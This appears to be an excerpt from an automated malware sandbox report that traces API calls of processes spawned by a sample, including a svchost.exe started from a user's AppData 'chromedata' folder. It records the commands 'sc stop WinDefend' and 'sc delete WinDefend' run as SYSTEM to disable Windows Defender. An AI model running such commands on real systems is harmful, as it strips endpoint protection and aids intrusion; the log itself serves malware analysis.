	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee173e0"
	os_pid = "0x8a0"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "27"
	os_parent_pid = "0x7dc"
	cmd_line = "sc  stop WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 140
	os_tid = 0x98c

	[0085.233] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8e0 | out: lpSystemTimeAsFileTime=0x20f8e0*(dwLowDateTime=0x1ca68580, dwHighDateTime=0x1d50a6a)) 
	[0085.234] GetCurrentProcessId () returned 0x8a0
	[0085.234] GetCurrentThreadId () returned 0x98c
	[0085.234] GetTickCount () returned 0xa6d1b3
	[0085.234] QueryPerformanceCounter (in: lpPerformanceCount=0x20f8d8 | out: lpPerformanceCount=0x20f8d8*=15907162426) returned 1
	[0085.234] GetModuleHandleA (lpModuleName=0x0) returned 0x2d0000
	[0085.234] __set_app_type (_Type=0x1) 
	[0085.234] __p__fmode () returned 0x770231f4
	[0085.234] __p__commode () returned 0x770231fc
	[0085.234] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2d79c7) returned 0x0
	[0085.234] __wgetmainargs (in: _Argc=0x2d9020, _Argv=0x2d9028, _Env=0x2d9024, _DoWildCard=0, _StartInfo=0x2d9034 | out: _Argc=0x2d9020, _Argv=0x2d9028, _Env=0x2d9024) returned 0
	[0085.235] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0085.236] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0085.236] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0085.236] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23
	[0085.236] _wcsicmp (_String1="stop", _String2="query") returned 2
	[0085.236] _wcsicmp (_String1="stop", _String2="queryex") returned 2
	[0085.236] _wcsicmp (_String1="stop", _String2="start") returned 14
	[0085.236] _wcsicmp (_String1="stop", _String2="pause") returned 3
	[0085.236] _wcsicmp (_String1="stop", _String2="interrogate") returned 10
	[0085.236] _wcsicmp (_String1="stop", _String2="control") returned 16
	[0085.236] _wcsicmp (_String1="stop", _String2="continue") returned 16
	[0085.236] _wcsicmp (_String1="stop", _String2="stop") returned 0
	[0085.236] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x9f020
	[0085.238] OpenServiceW (hSCManager=0x9f020, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x0
	[0085.239] GetLastError () returned 0x424
	[0085.239] _itow (in: _Dest=0x424, _Radix=2160504 | out: _Dest=0x424) returned="1060"
	[0085.239] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x2d9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f
	[0085.240] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x20f760, nSize=0x2, Arguments=0x20f76c | out: lpBuffer="੘\n\x01") returned 0x62
	[0085.241] GetFileType (hFile=0x7) returned 0x2
	[0085.241] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20f734 | out: lpMode=0x20f734) returned 1
	[0085.241] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa0a58*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x20f750, lpReserved=0x0 | out: lpBuffer=0xa0a58*, lpNumberOfCharsWritten=0x20f750*=0x62) returned 1
	[0085.242] LocalFree (hMem=0xa0a58) returned 0x0
	[0085.242] LocalFree (hMem=0x0) returned 0x0
	[0085.242] CloseServiceHandle (hSCObject=0x9f020) returned 1
	[0085.270] exit (_Code=1060) 

Thread:
	id = 141
	os_tid = 0x994


Process:
	id = "31"
	image_name = "sc.exe"
	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee17680"
	os_pid = "0x9a0"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "29"
	os_parent_pid = "0x394"
	cmd_line = "sc  delete WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 142
	os_tid = 0x9a4

	[0085.288] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fdd0 | out: lpSystemTimeAsFileTime=0x19fdd0*(dwLowDateTime=0x1cb00b00, dwHighDateTime=0x1d50a6a)) 
	[0085.288] GetCurrentProcessId () returned 0x9a0
	[0085.288] GetCurrentThreadId () returned 0x9a4
	[0085.288] GetTickCount () returned 0xa6d1f1
	[0085.288] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdc8 | out: lpPerformanceCount=0x19fdc8*=15912605200) returned 1
	[0085.288] GetModuleHandleA (lpModuleName=0x0) returned 0x2d0000
	[0085.288] __set_app_type (_Type=0x1) 
	[0085.288] __p__fmode () returned 0x770231f4
	[0085.288] __p__commode () returned 0x770231fc
	[0085.288] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2d79c7) returned 0x0
	[0085.288] __wgetmainargs (in: _Argc=0x2d9020, _Argv=0x2d9028, _Env=0x2d9024, _DoWildCard=0, _StartInfo=0x2d9034 | out: _Argc=0x2d9020, _Argv=0x2d9028, _Env=0x2d9024) returned 0
	[0085.289] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0085.290] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0085.290] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0085.290] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8
	[0085.290] _wcsicmp (_String1="delete", _String2="query") returned -13
	[0085.290] _wcsicmp (_String1="delete", _String2="queryex") returned -13
	[0085.290] _wcsicmp (_String1="delete", _String2="start") returned -15
	[0085.290] _wcsicmp (_String1="delete", _String2="pause") returned -12
	[0085.290] _wcsicmp (_String1="delete", _String2="interrogate") returned -5
	[0085.290] _wcsicmp (_String1="delete", _String2="control") returned 1
	[0085.290] _wcsicmp (_String1="delete", _String2="continue") returned 1
	[0085.290] _wcsicmp (_String1="delete", _String2="stop") returned -15
	[0085.290] _wcsicmp (_String1="delete", _String2="config") returned 1
	[0085.290] _wcsicmp (_String1="delete", _String2="description") returned -7
	[0085.290] _wcsicmp (_String1="delete", _String2="failure") returned -2
	[0085.290] _wcsicmp (_String1="delete", _String2="privs") returned -12
	[0085.290] _wcsicmp (_String1="delete", _String2="failureflag") returned -2
	[0085.291] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16
	[0085.291] _wcsicmp (_String1="delete", _String2="sidtype") returned -15
	[0085.291] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12
	[0085.291] _wcsicmp (_String1="delete", _String2="qc") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="qdescription") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="qfailure") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="qprivs") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="showsid") returned -15
	[0085.291] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="querylock") returned -13
	[0085.291] _wcsicmp (_String1="delete", _String2="lock") returned -8
	[0085.291] _wcsicmp (_String1="delete", _String2="delete") returned 0
	[0085.291] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4cf028
	[0085.293] OpenServiceW (hSCManager=0x4cf028, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x0
	[0085.293] GetLastError () returned 0x424
	[0085.293] _itow (in: _Dest=0x424, _Radix=1703136 | out: _Dest=0x424) returned="1060"
	[0085.293] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x2d9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f
	[0085.294] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x19fcc8, nSize=0x2, Arguments=0x19fcd4 | out: lpBuffer="੠M༄)\x03") returned 0x62
	[0085.295] GetFileType (hFile=0x7) returned 0x2
	[0085.295] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x19fc9c | out: lpMode=0x19fc9c) returned 1
	[0085.295] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4d0a60*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x19fcb8, lpReserved=0x0 | out: lpBuffer=0x4d0a60*, lpNumberOfCharsWritten=0x19fcb8*=0x62) returned 1
	[0085.295] LocalFree (hMem=0x4d0a60) returned 0x0
	[0085.295] LocalFree (hMem=0x0) returned 0x0
	[0085.295] CloseServiceHandle (hSCObject=0x4cf028) returned 1
	[0085.304] exit (_Code=1060) 

Thread:
	id = 143
	os_tid = 0x9a8


Process:
	id = "32"
	image_name = "dllhost.exe"
	filename = "c:\\windows\\system32\\dllhost.exe"
	page_root = "0x7ee172e0"
	os_pid = "0xa18"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b7e890"
	monitor_reason = "rpc_server"
	parent_id = "25"
	os_parent_pid = "0x34c"
	cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 156
	os_tid = 0x9f4


Thread:
	id = 157
	os_tid = 0x9c8


Thread:
	id = 158
	os_tid = 0x9c0


Thread:
	id = 159
	os_tid = 0xa28


Thread:
	id = 160
	os_tid = 0xa24


Thread:
	id = 161
	os_tid = 0x9f0


Thread:
	id = 162
	os_tid = 0x954


Process:
	id = "33"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee17700"
	os_pid = "0x4d8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 163
	os_tid = 0x9e8

	[0153.766] ResetEvent (hEvent=0x8) returned 1
	[0153.766] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.766] ResetEvent (hEvent=0x8) returned 1
	[0153.766] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.772] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0153.773] ResetEvent (hEvent=0x8) returned 1
	[0153.773] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.774] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleW") returned 0x76b6374d
	[0153.775] ResetEvent (hEvent=0x8) returned 1
	[0153.775] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.777] GetProcAddress (hModule=0x76b10000, lpProcName="GetVersionExW") returned 0x76b53b1a
	[0153.777] ResetEvent (hEvent=0x8) returned 1
	[0153.777] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.779] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.779] ResetEvent (hEvent=0x8) returned 1
	[0153.779] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.781] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0153.781] ResetEvent (hEvent=0x8) returned 1
	[0153.781] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.784] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0153.784] ResetEvent (hEvent=0x8) returned 1
	[0153.784] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.786] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0153.786] ResetEvent (hEvent=0x8) returned 1
	[0153.786] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.788] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0153.788] ResetEvent (hEvent=0x8) returned 1
	[0153.788] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.790] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0153.790] ResetEvent (hEvent=0x8) returned 1
	[0153.790] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.792] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenW") returned 0x76b5d9e8
	[0153.793] ResetEvent (hEvent=0x8) returned 1
	[0153.793] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.795] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0153.795] ResetEvent (hEvent=0x8) returned 1
	[0153.795] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.797] GetProcAddress (hModule=0x76b10000, lpProcName="UnhandledExceptionFilter") returned 0x76b6ed38
	[0153.797] ResetEvent (hEvent=0x8) returned 1
	[0153.797] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.799] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcess") returned 0x76b5cdcf
	[0153.799] ResetEvent (hEvent=0x8) returned 1
	[0153.799] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.802] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateProcess") returned 0x76b52331
	[0153.802] ResetEvent (hEvent=0x8) returned 1
	[0153.802] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.804] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76b62fde
	[0153.804] ResetEvent (hEvent=0x8) returned 1
	[0153.804] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.806] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessId") returned 0x76b5cac4
	[0153.806] ResetEvent (hEvent=0x8) returned 1
	[0153.806] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.809] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentThreadId") returned 0x76b5bb80
	[0153.809] ResetEvent (hEvent=0x8) returned 1
	[0153.809] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.811] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount") returned 0x76b5ba60
	[0153.811] ResetEvent (hEvent=0x8) returned 1
	[0153.811] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.814] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceCounter") returned 0x76b5bb9f
	[0153.814] ResetEvent (hEvent=0x8) returned 1
	[0153.814] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.816] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedCompareExchange") returned 0x76b5bb92
	[0153.816] ResetEvent (hEvent=0x8) returned 1
	[0153.816] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.819] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0153.819] ResetEvent (hEvent=0x8) returned 1
	[0153.819] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.821] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedExchange") returned 0x76b5bf0a
	[0153.821] ResetEvent (hEvent=0x8) returned 1
	[0153.821] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.823] GetProcAddress (hModule=0x76b10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76b63d01
	[0153.823] ResetEvent (hEvent=0x8) returned 1
	[0153.823] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.825] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x774c0000
	[0153.827] ResetEvent (hEvent=0x8) returned 1
	[0153.827] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.828] GetProcAddress (hModule=0x774c0000, lpProcName="RegEnumKeyExW") returned 0x774d46c8
	[0153.829] ResetEvent (hEvent=0x8) returned 1
	[0153.829] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.831] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExW") returned 0x774d468d
	[0153.831] ResetEvent (hEvent=0x8) returned 1
	[0153.831] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.833] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryValueExW") returned 0x774d46ad
	[0153.833] ResetEvent (hEvent=0x8) returned 1
	[0153.833] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.835] GetProcAddress (hModule=0x774c0000, lpProcName="RegCloseKey") returned 0x774d469d
	[0153.835] ResetEvent (hEvent=0x8) returned 1
	[0153.835] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.838] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryInfoKeyW") returned 0x774d46e7
	[0153.838] ResetEvent (hEvent=0x8) returned 1
	[0153.838] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.840] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76cd0000
	[0153.853] ResetEvent (hEvent=0x8) returned 1
	[0153.853] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.856] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitializeSecurity") returned 0x76cf7259
	[0153.856] ResetEvent (hEvent=0x8) returned 1
	[0153.856] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.859] GetProcAddress (hModule=0x76cd0000, lpProcName="CoCreateInstance") returned 0x76d19d0b
	[0153.859] ResetEvent (hEvent=0x8) returned 1
	[0153.859] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.861] GetProcAddress (hModule=0x76cd0000, lpProcName="CoSetProxyBlanket") returned 0x76ce5ea5
	[0153.861] ResetEvent (hEvent=0x8) returned 1
	[0153.861] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.863] GetProcAddress (hModule=0x76cd0000, lpProcName="CoUninitialize") returned 0x76d186d3
	[0153.863] ResetEvent (hEvent=0x8) returned 1
	[0153.863] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.866] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitializeEx") returned 0x76d109ad
	[0153.866] ResetEvent (hEvent=0x8) returned 1
	[0153.866] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.868] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76a60000
	[0153.869] ResetEvent (hEvent=0x8) returned 1
	[0153.869] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.871] GetProcAddress (hModule=0x76a60000, lpProcName=0xc) returned 0x76a65dee
	[0153.871] ResetEvent (hEvent=0x8) returned 1
	[0153.871] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.873] GetProcAddress (hModule=0x76a60000, lpProcName=0x7) returned 0x76a64680
	[0153.873] ResetEvent (hEvent=0x8) returned 1
	[0153.873] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.874] GetProcAddress (hModule=0x76a60000, lpProcName=0x9) returned 0x76a63eae
	[0153.874] ResetEvent (hEvent=0x8) returned 1
	[0153.875] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.876] GetProcAddress (hModule=0x76a60000, lpProcName=0x2) returned 0x76a64642
	[0153.876] ResetEvent (hEvent=0x8) returned 1
	[0153.876] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.879] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f80000
	[0153.879] ResetEvent (hEvent=0x8) returned 1
	[0153.879] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.881] GetProcAddress (hModule=0x76f80000, lpProcName="_except_handler4_common") returned 0x76fa3e27
	[0153.881] ResetEvent (hEvent=0x8) returned 1
	[0153.881] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.883] GetProcAddress (hModule=0x76f80000, lpProcName="??2@YAPAXI@Z") returned 0x76f8b0c9
	[0153.883] ResetEvent (hEvent=0x8) returned 1
	[0153.883] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.885] GetProcAddress (hModule=0x76f80000, lpProcName="_amsg_exit") returned 0x76feb2ef
	[0153.885] ResetEvent (hEvent=0x8) returned 1
	[0153.885] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.888] GetProcAddress (hModule=0x76f80000, lpProcName="_initterm") returned 0x76f8c151
	[0153.888] ResetEvent (hEvent=0x8) returned 1
